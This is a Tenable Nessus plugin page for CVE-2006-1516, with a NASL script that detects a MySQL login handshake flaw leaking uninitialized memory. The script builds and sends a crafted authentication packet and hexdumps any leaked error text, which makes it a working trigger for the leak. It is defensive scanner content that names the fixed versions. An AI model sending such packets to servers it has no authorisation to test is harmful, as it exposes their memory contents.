MySQL Anonymous Login Handshake Remote Information Disclosure

2006-06-0400:00:00

www.tenable.com

417

The MySQL database server on the remote host reads from uninitialized memory when processing a specially crafted login packet. An unauthenticated attacker may be able to exploit this flaw to obtain sensitive information from the affected host as returned in an error packet.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(21632);
  script_version("1.21");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2006-1516");
  script_bugtraq_id(17780);

  script_name(english:"MySQL Anonymous Login Handshake Remote Information Disclosure");

  script_set_attribute(attribute:"synopsis", value:
"The remote database server is affected by an information disclosure
flaw.");
  script_set_attribute(attribute:"description", value:
"The MySQL database server on the remote host reads from uninitialized
memory when processing a specially crafted login packet.  An
unauthenticated attacker may be able to exploit this flaw to obtain
sensitive information from the affected host as returned in an error
packet.");
  script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/432733/30/0/threaded");
  script_set_attribute(attribute:"see_also", value:"http://dev.mysql.com/doc/refman/4.1/en/news-4-0-27.html");
  script_set_attribute(attribute:"see_also", value:"http://dev.mysql.com/doc/refman/4.1/en/news-4-1-19.html");
  script_set_attribute(attribute:"see_also", value:"http://dev.mysql.com/doc/refman/5.0/en/news-5-0-21.html");
  script_set_attribute(attribute:"see_also", value:"http://dev.mysql.com/doc/refman/5.1/en/news-5-1-10.html");
  script_set_attribute(attribute:"solution", value:
"Upgrade to MySQL 4.0.27 / 4.1.19 / 5.0.21 / 5.1.10 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2006/05/02");
  script_set_attribute(attribute:"plugin_publication_date", value:"2006/06/04");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:mysql:mysql");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"Databases");

  script_copyright(english:"This script is Copyright (C) 2006-2022 Tenable Network Security, Inc.");

  script_dependencies("find_service1.nasl");
  script_require_ports("Services/mysql", 3306);

  exit(0);
}


include("dump.inc");
include("global_settings.inc");
include("misc_func.inc");
include("mysql_func.inc");


port = get_service(svc:"mysql", default:3306, exit_on_fail:TRUE);
# Establish a connection.
#
# nb: this requires that the nessusd host be allowed to connect.
mysql_init(port:port, nocache:TRUE, exit_on_fail:TRUE);

# Exclude MariaDB MaxScale servers due to a false positive
ver = mysql_get_version();
if ('maxscale' >< ver) audit(AUDIT_LISTEN_NOT_VULN, 'MariaDB MaxScale', port, ver, 'MySQL');


# Send a malicious client authentication packet.
add_caps = CLIENT_LONG_PASSWORD | CLIENT_CONNECT_WITH_DB | CLIENT_PROTOCOL_41;
cap = mkdword(mysql_get_caps() | add_caps) +     # client capabilities
                                                 #   1 => long password
                                                 #   8 => specify db on connect
                                                 #   512 => 4.1 protocol
  mkdword(65535) +                               # max packet size
  mkbyte(mysql_get_lang()) +                     # charset
  crap(data:raw_string(0), length:23) +          # filler
  "nessus" +                                     # username minus null byte
  mkbyte(20) + crap(20) +                        # scramble (len + data)
  SCRIPT_NAME + crap(20) + mkbyte(0);            # database plus null byte
mysql_send_packet(data:cap);
pkt = mysql_recv_packet();
if (!isnull(pkt))
{
  err = mysql_parse_error_packet(packet:pkt);
  # nb: a non-affected version will report "Bad handshake".
  if (
    !isnull(err) && 
    (
      "Access denied" >< err["msg"] || 
      "Incorrect database name" >< err["msg"]
    )
  )
  {
    if (report_verbosity > 1)
    {
      msg = hexdump(ddata:err["msg"]);
      report = '\nHere is the text returned by the affected MySQL server :\n\n  '+msg+'\n';
    }
    else
      report = NULL;
    security_warning(port:port, extra:report);
    mysql_close();
    exit(0);
  }
}
mysql_close();

exit(0, 'The MySQL server on port '+port+' is not affected.');

VendorProductVersionCPE
mysqlmysqlcpe:/a:mysql:mysql

Vendor	Product	Version	CPE
mysql	mysql		cpe:/a:mysql:mysql

References

cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1516

dev.mysql.com/doc/refman/4.1/en/news-4-0-27.html

dev.mysql.com/doc/refman/4.1/en/news-4-1-19.html

dev.mysql.com/doc/refman/5.0/en/news-5-0-21.html

dev.mysql.com/doc/refman/5.1/en/news-5-1-10.html

www.securityfocus.com/archive/1/432733/30/0/threaded

JSON

Related for MYSQL_ANONYMOUS_LOGIN_HANDSHAKE_INFO_LEAKAGE.NASL